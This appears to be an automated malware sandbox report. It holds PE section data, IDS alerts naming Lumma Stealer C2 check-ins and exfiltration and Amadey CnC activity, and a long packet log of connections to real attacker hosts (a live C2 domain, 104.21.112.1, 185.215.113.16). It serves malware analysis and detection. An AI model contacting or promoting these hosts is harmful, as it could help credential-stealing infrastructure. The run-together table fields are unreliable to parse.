                                                                                                              yccyqbqs0x49c0000x10000x400500223967f5a86ee5d67e05d3f638f23False0.7607421875data5.925554061500847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .taggant0x49d0000x30000x2200328cfe172b611a482f109292b278604bFalse0.0546875DOS executable (COM)0.5884367883571402IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                              RT_MANIFEST0x530580x256ASCII text, with CRLF line terminators0.5100334448160535
                                                                                                              DLLImport
                                                                                                              kernel32.dlllstrcpy
                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                              2024-12-31T09:48:27.818762+01002058656ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop)1192.168.2.6493711.1.1.153UDP
                                                                                                              2024-12-31T09:48:28.302124+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.649712104.21.112.1443TCP
                                                                                                              2024-12-31T09:48:28.302124+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649712104.21.112.1443TCP
                                                                                                              2024-12-31T09:48:29.154933+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649712104.21.112.1443TCP
                                                                                                              2024-12-31T09:48:29.154933+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649712104.21.112.1443TCP
                                                                                                              2024-12-31T09:48:29.641749+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.649713104.21.112.1443TCP
                                                                                                              2024-12-31T09:48:29.641749+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649713104.21.112.1443TCP
                                                                                                              2024-12-31T09:48:30.138929+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649713104.21.112.1443TCP
                                                                                                              2024-12-31T09:48:30.138929+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649713104.21.112.1443TCP
                                                                                                              2024-12-31T09:48:30.870750+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.649715104.21.112.1443TCP
                                                                                                              2024-12-31T09:48:30.870750+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649715104.21.112.1443TCP
                                                                                                              2024-12-31T09:48:32.626850+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.649716104.21.112.1443TCP
                                                                                                              2024-12-31T09:48:32.626850+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649716104.21.112.1443TCP
                                                                                                              2024-12-31T09:48:33.719521+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.649717104.21.112.1443TCP
                                                                                                              2024-12-31T09:48:33.719521+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649717104.21.112.1443TCP
                                                                                                              2024-12-31T09:48:34.975857+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.649718104.21.112.1443TCP
                                                                                                              2024-12-31T09:48:34.975857+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649718104.21.112.1443TCP
                                                                                                              2024-12-31T09:48:35.412465+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649718104.21.112.1443TCP
                                                                                                              2024-12-31T09:48:36.512535+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.649725104.21.112.1443TCP
                                                                                                              2024-12-31T09:48:36.512535+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649725104.21.112.1443TCP
                                                                                                              2024-12-31T09:48:38.587255+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.649742104.21.112.1443TCP
                                                                                                              2024-12-31T09:48:38.587255+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649742104.21.112.1443TCP
                                                                                                              2024-12-31T09:48:39.122566+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649742104.21.112.1443TCP
                                                                                                              2024-12-31T09:49:10.169424+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.649946185.215.113.4380TCP
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Dec 31, 2024 09:48:27.837459087 CET49712443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:27.837500095 CET44349712104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:27.837677956 CET49712443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:27.841212034 CET49712443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:27.841228962 CET44349712104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:28.301888943 CET44349712104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:28.302124023 CET49712443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:28.371898890 CET49712443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:28.371933937 CET44349712104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:28.372334957 CET44349712104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:28.428194046 CET49712443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:28.721422911 CET49712443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:28.721422911 CET49712443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:28.721587896 CET44349712104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:29.154946089 CET44349712104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:29.155034065 CET44349712104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:29.155220032 CET49712443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:29.156768084 CET49712443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:29.156788111 CET44349712104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:29.156810045 CET49712443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:29.156816959 CET44349712104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:29.166183949 CET49713443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:29.166244984 CET44349713104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:29.166332006 CET49713443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:29.166748047 CET49713443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:29.166759968 CET44349713104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:29.641583920 CET44349713104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:29.641748905 CET49713443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:29.643044949 CET49713443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:29.643060923 CET44349713104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:29.643363953 CET44349713104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:29.644553900 CET49713443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:29.644578934 CET49713443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:29.644634008 CET44349713104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:30.138928890 CET44349713104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:30.138998032 CET44349713104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:30.139031887 CET44349713104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:30.139045954 CET49713443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:30.139074087 CET44349713104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:30.139113903 CET49713443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:30.139117956 CET44349713104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:30.139132023 CET44349713104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:30.139173031 CET49713443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:30.139175892 CET44349713104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:30.139184952 CET44349713104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:30.139216900 CET49713443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:30.139225960 CET44349713104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:30.139894009 CET44349713104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:30.139955997 CET49713443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:30.139969110 CET44349713104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:30.143671989 CET44349713104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:30.143739939 CET49713443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:30.143757105 CET44349713104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:30.193670988 CET49713443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:30.227646112 CET44349713104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:30.227709055 CET44349713104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:30.227735043 CET44349713104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:30.227823973 CET44349713104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:30.227895975 CET49713443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:30.227895975 CET49713443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:30.228107929 CET49713443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:30.228154898 CET44349713104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:30.228183985 CET49713443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:30.228199005 CET44349713104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:30.379390001 CET49715443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:30.379465103 CET44349715104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:30.379569054 CET49715443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:30.379877090 CET49715443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:30.379895926 CET44349715104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:30.870654106 CET44349715104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:30.870749950 CET49715443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:30.872421026 CET49715443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:30.872453928 CET44349715104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:30.872744083 CET44349715104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:30.874028921 CET49715443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:30.874181986 CET49715443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:30.874219894 CET44349715104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:32.055941105 CET44349715104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:32.056045055 CET44349715104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:32.056107044 CET49715443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:32.056237936 CET49715443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:32.056263924 CET44349715104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:32.161369085 CET49716443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:32.161421061 CET44349716104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:32.161501884 CET49716443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:32.161813021 CET49716443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:32.161825895 CET44349716104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:32.626720905 CET44349716104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:32.626849890 CET49716443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:32.628168106 CET49716443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:32.628179073 CET44349716104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:32.628421068 CET44349716104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:32.629798889 CET49716443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:32.629950047 CET49716443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:32.629981041 CET44349716104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:32.630028009 CET49716443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:32.675333023 CET44349716104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:32.993990898 CET44349716104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:32.994112015 CET44349716104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:32.994175911 CET49716443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:32.994283915 CET49716443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:32.994307995 CET44349716104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:33.227415085 CET49717443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:33.227457047 CET44349717104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:33.227543116 CET49717443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:33.227842093 CET49717443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:33.227861881 CET44349717104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:33.719443083 CET44349717104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:33.719521046 CET49717443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:33.720846891 CET49717443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:33.720855951 CET44349717104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:33.721122980 CET44349717104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:33.722683907 CET49717443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:33.722879887 CET49717443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:33.722904921 CET44349717104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:33.722965956 CET49717443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:33.722970963 CET44349717104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:34.250823975 CET44349717104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:34.250916958 CET44349717104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:34.250968933 CET49717443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:34.251112938 CET49717443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:34.251130104 CET44349717104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:34.521821976 CET49718443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:34.521877050 CET44349718104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:34.521948099 CET49718443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:34.522239923 CET49718443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:34.522252083 CET44349718104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:34.975758076 CET44349718104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:34.975857019 CET49718443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:34.977322102 CET49718443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:34.977338076 CET44349718104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:34.977571964 CET44349718104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:34.978952885 CET49718443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:34.979062080 CET49718443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:34.979067087 CET44349718104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:35.412486076 CET44349718104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:35.412581921 CET44349718104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:35.412658930 CET49718443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:35.412897110 CET49718443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:35.412919044 CET44349718104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:36.038533926 CET49725443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:36.038583040 CET44349725104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:36.038640022 CET49725443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:36.038997889 CET49725443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:36.039010048 CET44349725104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:36.512451887 CET44349725104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:36.512535095 CET49725443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:36.513832092 CET49725443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:36.513840914 CET44349725104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:36.514096022 CET44349725104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:36.538264990 CET49725443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:36.539133072 CET49725443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:36.539158106 CET44349725104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:36.539248943 CET49725443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:36.539264917 CET44349725104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:36.539365053 CET49725443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:36.539411068 CET44349725104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:36.539480925 CET49725443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:36.539496899 CET44349725104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:36.539505959 CET49725443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:36.539518118 CET44349725104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:36.539613962 CET49725443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:36.539628029 CET44349725104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:36.539752007 CET49725443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:36.539771080 CET44349725104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:36.539782047 CET49725443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:36.539885044 CET49725443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:36.539906979 CET49725443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:36.549087048 CET44349725104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:36.549182892 CET49725443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:36.549201012 CET44349725104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:36.549235106 CET49725443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:36.549258947 CET49725443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:36.549264908 CET44349725104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:36.549308062 CET49725443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:36.549412012 CET49725443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:36.549438953 CET49725443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:36.553890944 CET44349725104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:36.553936005 CET49725443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:36.553955078 CET44349725104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:38.080528021 CET44349725104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:38.080625057 CET44349725104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:38.080698013 CET49725443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:38.080854893 CET49725443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:38.080877066 CET44349725104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:38.112272978 CET49742443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:38.112287045 CET44349742104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:38.112351894 CET49742443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:38.112616062 CET49742443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:38.112627029 CET44349742104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:38.587152004 CET44349742104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:38.587255001 CET49742443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:38.588534117 CET49742443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:38.588550091 CET44349742104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:38.588794947 CET44349742104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:38.590081930 CET49742443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:38.590106964 CET49742443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:38.590146065 CET44349742104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:39.122576952 CET44349742104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:39.122689009 CET44349742104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:39.122767925 CET49742443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:39.123016119 CET49742443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:39.123023033 CET44349742104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:39.123038054 CET49742443192.168.2.6104.21.112.1
                                                                                                              Dec 31, 2024 09:48:39.123044968 CET44349742104.21.112.1192.168.2.6
                                                                                                              Dec 31, 2024 09:48:39.125334024 CET4974880192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:39.130168915 CET8049748185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:39.130239010 CET4974880192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:39.130386114 CET4974880192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:39.135206938 CET8049748185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:39.771985054 CET4974880192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:39.775325060 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:39.780133963 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:39.780220032 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:39.780358076 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:39.785173893 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.472445011 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.472482920 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.472491980 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.472507954 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.472518921 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.472528934 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.472538948 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.472559929 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.472569942 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.472572088 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.472580910 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.472629070 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.477416992 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.477430105 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.477441072 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.477478027 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.521696091 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.597651958 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.597670078 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.597681046 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.597759008 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.597804070 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.597815037 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.597826004 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.597855091 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.597872972 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.598189116 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.598201036 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.598206997 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.598239899 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.598241091 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.598251104 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.598289967 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.598927975 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.598938942 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.598948956 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.598965883 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.598978996 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.598989010 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.598989010 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.599014997 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.599854946 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.599868059 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.599878073 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.599886894 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.599898100 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.599912882 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.599931955 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.600639105 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.600652933 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.600675106 CET4975480192.168.2.6185.215.113.16
